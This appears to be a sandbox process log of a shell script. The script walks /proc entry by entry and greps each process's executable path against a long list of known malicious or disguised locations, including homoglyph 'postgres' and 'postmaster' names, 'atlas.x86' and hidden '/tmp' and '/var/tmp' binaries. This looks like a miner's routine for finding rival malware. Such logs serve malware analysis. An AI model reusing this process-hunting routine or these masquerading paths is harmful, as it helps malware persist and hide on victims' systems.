/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:822
-
-
/bin/grepgrep exe2⤵PID:825
-
-
/bin/lsls -latrh /proc/202⤵PID:824
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:827
-
-
/bin/grepgrep exe2⤵PID:830
-
-
/bin/lsls -latrh /proc/212⤵PID:829
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:832
-
-
/bin/grepgrep exe2⤵PID:835
-
-
/bin/lsls -latrh /proc/222⤵PID:834
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:837
-
-
/bin/grepgrep exe2⤵PID:840
-
-
/bin/lsls -latrh /proc/232⤵PID:839
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:842
-
-
/bin/grepgrep exe2⤵PID:845
-
-
/bin/lsls -latrh /proc/2342⤵PID:844
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:847
-
-
/bin/lsls -latrh /proc/242⤵PID:849
-
-
/bin/grepgrep exe2⤵PID:850
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:852
-
-
/bin/grepgrep exe2⤵PID:855
-
-
/bin/lsls -latrh /proc/2542⤵PID:854
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:857
-
-
/bin/grepgrep exe2⤵PID:860
-
-
/bin/lsls -latrh /proc/32⤵PID:859
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:862
-
-
/bin/grepgrep exe2⤵PID:865
-
-
/bin/lsls -latrh /proc/3352⤵PID:864
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:870
-
-
/bin/lsls -latrh /proc/3362⤵PID:869
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:872
-
-
/bin/grepgrep exe2⤵PID:875
-
-
/bin/lsls -latrh /proc/362⤵PID:874
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:877
-
-
/bin/grepgrep exe2⤵PID:880
-
-
/bin/lsls -latrh /proc/3602⤵PID:879
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:882
-
-
/bin/grepgrep exe2⤵PID:885
-
-
/bin/lsls -latrh /proc/3642⤵PID:884
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:889
-
-
/bin/grepgrep exe2⤵PID:892
-
-
/bin/lsls -latrh /proc/3662⤵PID:891
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:894
-
-
/bin/grepgrep exe2⤵PID:899
-
-
/bin/lsls -latrh /proc/372⤵PID:898
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:901
-
-
/bin/grepgrep exe2⤵PID:905
-
-
/bin/lsls -latrh /proc/3852⤵PID:904
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:908
-
-
/bin/grepgrep exe2⤵PID:912
-
-
/bin/lsls -latrh /proc/3862⤵PID:911
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:915
-
-
/bin/grepgrep exe2⤵PID:918
-
-
/bin/lsls -latrh /proc/3882⤵PID:917
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:922
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/lsls -latrh /proc/3962⤵PID:924
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:928
-
-
/bin/grepgrep exe2⤵PID:932
-
-
/bin/lsls -latrh /proc/42⤵PID:931
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:934
-
-
/bin/grepgrep exe2⤵PID:938
-
-
/bin/lsls -latrh /proc/52⤵PID:937
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:941
-
-
/bin/grepgrep exe2⤵PID:945
-
-
/bin/lsls -latrh /proc/62⤵PID:944
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:948
-
-
/bin/grepgrep exe2⤵PID:951
-
-
/bin/lsls -latrh /proc/6642⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:954
-
-
/bin/grepgrep exe2⤵PID:958
-
-
/bin/lsls -latrh /proc/6672⤵PID:957
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:961
-
-
/bin/grepgrep exe2⤵PID:965
-
-
/bin/lsls -latrh /proc/6692⤵PID:964
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:967
-
-
/bin/grepgrep exe2⤵PID:971
-
-
/bin/lsls -latrh /proc/6742⤵PID:970
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:974
-
-
/bin/grepgrep exe2⤵PID:978
-
-
/bin/lsls -latrh /proc/6752⤵PID:977
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:981
-
-
/bin/grepgrep exe2⤵PID:985
-
-
/bin/lsls -latrh /proc/6902⤵PID:984
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:988
-
-
/bin/grepgrep exe2⤵PID:991
-
-
/bin/lsls -latrh /proc/6912⤵PID:990
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:995
-
-
/bin/grepgrep exe2⤵PID:999
-
-
/bin/lsls -latrh /proc/6952⤵PID:998
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/grepgrep exe2⤵PID:1007
-
-
/bin/lsls -latrh /proc/6962⤵PID:1006
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1009
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/lsls -latrh /proc/6972⤵PID:1012
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1018
-
-
/bin/grepgrep exe2⤵PID:1022
-
-
/bin/lsls -latrh /proc/72⤵PID:1021
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1025
-
-
/bin/grepgrep exe2⤵PID:1029
-
-
/bin/lsls -latrh /proc/702⤵PID:1028
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1032
-
-
/bin/grepgrep exe2⤵PID:1036
-
-
/bin/lsls -latrh /proc/7002⤵PID:1035
-
-
